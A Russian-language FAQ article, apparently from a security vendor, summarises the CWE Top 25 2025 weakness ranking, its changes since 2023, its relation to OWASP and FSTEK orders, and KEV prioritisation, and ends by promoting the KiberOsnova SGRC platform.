В рейтинге CWE Top 25 2025 первое место занимает CWE-79 — Cross-site Scripting (XSS) со score 60.38 и 7 уязвимостями в каталоге CISA KEV. Это серьёзная перестановка относительно версии 2023, где лидировала CWE-787 (Out-of-bounds Write). В 2025 году MITRE зафиксировал значительный рост числа CVE, связанных с XSS, особенно в современных JavaScript-фреймворках, low-code платформах и no-code конструкторах. На втором месте CWE-89 (SQL Injection, 28.72), на третьем CWE-352 (CSRF, 13.64), на четвёртом CWE-862 (Missing Authorization, 13.28), на пятом CWE-787 (Out-of-bounds Write, 12.68).
Что такое CWE Top 25 2025 и кто его составляет
CWE Top 25 Most Dangerous Software Weaknesses — ежегодный рейтинг, который публикует MITRE Corporation при поддержке CISA. Версия 2025 опубликована 29 января 2026 года и построена на анализе 39 080 CVE-записей из NVD за 2023–2024 годы с учётом каталога CISA KEV. Каждому типу уязвимости присваивается взвешенный score по формуле frequency × severity, отражающий распространённость и опасность типа уязвимости.
Что изменилось в CWE Top 25 2025 по сравнению с 2023
Главное изменение — XSS поднялась с 2 на 1 место и обогнала Out-of-bounds Write. SQL Injection — с 3 на 2. CSRF совершила резкий скачок с 9 на 3 (+6 позиций). Missing Authorization (CWE-862) — с 11 на 4. Out-of-bounds Write упала с 1 на 5. Memory-safety уязвимости в целом опустились. В Top 25 впервые появились CWE-120, CWE-121, CWE-122 (виды buffer overflow), CWE-200 (Sensitive Information Exposure), CWE-639 (Authorization Bypass) и CWE-770 (Resource Allocation without Limits). Выпали CWE-287, CWE-190, CWE-798, CWE-362, CWE-269, CWE-276.
Чем CWE Top 25 отличается от OWASP Top 10
OWASP Top 10 — категории рисков для веб-приложений (10 групп). CWE Top 25 — отдельные типы уязвимостей для всего ПО (25 записей). OWASP фокусируется на прикладном уровне, CWE Top 25 — на системном и инфраструктурном. В версии 2025 CWE Top 25 заметно сместился в сторону web (4 из 5 лидеров — веб-уязвимости), что сближает оба рейтинга. Оптимально использовать вместе: OWASP для прикладного уровня, CWE для системного.
Как CWE Top 25 связан с приказами ФСТЭК
Прямых ссылок на CWE в приказах ФСТЭК нет, но меры защиты из приказов №117, №21, №239, №17 фактически покрывают все 25 типов уязвимостей версии 2025. БДУ ФСТЭК классифицирует уязвимости по CWE, что даёт возможность применить рейтинг MITRE к российским реалиям. Подробный маппинг — в таблице выше. Группы АНЗ, УПД, ЗИС, ОЦЛ закрывают подавляющее большинство CWE Top 25 2025.
Что означает пометка KEV
KEV — Known Exploited Vulnerabilities Catalog CISA, каталог известных эксплуатируемых уязвимостей. Попадание CWE в KEV означает, что данный тип уязвимости активно используется реальными злоумышленниками. В версии 2025 максимум KEV-записей у CWE-78 (OS Command Injection) — 20 и CWE-416 (Use After Free) — 14, несмотря на их относительно невысокие позиции в общем рейтинге. Для российских организаций уязвимости из KEV должны устраняться в приоритетном порядке.
Какие CWE из Top 25 2025 самые опасные для российских систем
Для типичных российских ИС — ГИС, ИСПДн, объектов КИИ — наиболее критичны CWE-79 (XSS), CWE-89 (SQL Injection), CWE-862 (Missing Authorization, IDOR в API российских госуслуг и финтеха), CWE-352 (CSRF в admin-панелях CMS), CWE-502 (Deserialization в Java-приложениях), CWE-22 (Path Traversal). Эти типы уязвимостей напрямую связаны с риском утечек ПДн и оборотными штрафами по 420-ФЗ. Комплексная защита через меры ФСТЭК групп АНЗ, ЗИС, ОЦЛ и УПД закрывает большую часть актуальных угроз.
Как автоматизировать работу с CWE Top 25 2025 через SGRC
SGRC-платформа КиберОснова автоматически классифицирует уязвимости из БДУ ФСТЭК по CWE, показывает дашборд покрытия CWE Top 25 2025 мерами защиты, рассчитывает SLA по приказу №117, формирует отчёты для руководства и регуляторов. После публикации версии 2025 платформа автоматически перестроила приоритеты под новых лидеров рейтинга — XSS, SQL Injection, CSRF, Missing Authorization. Запросите демо для детального знакомства.
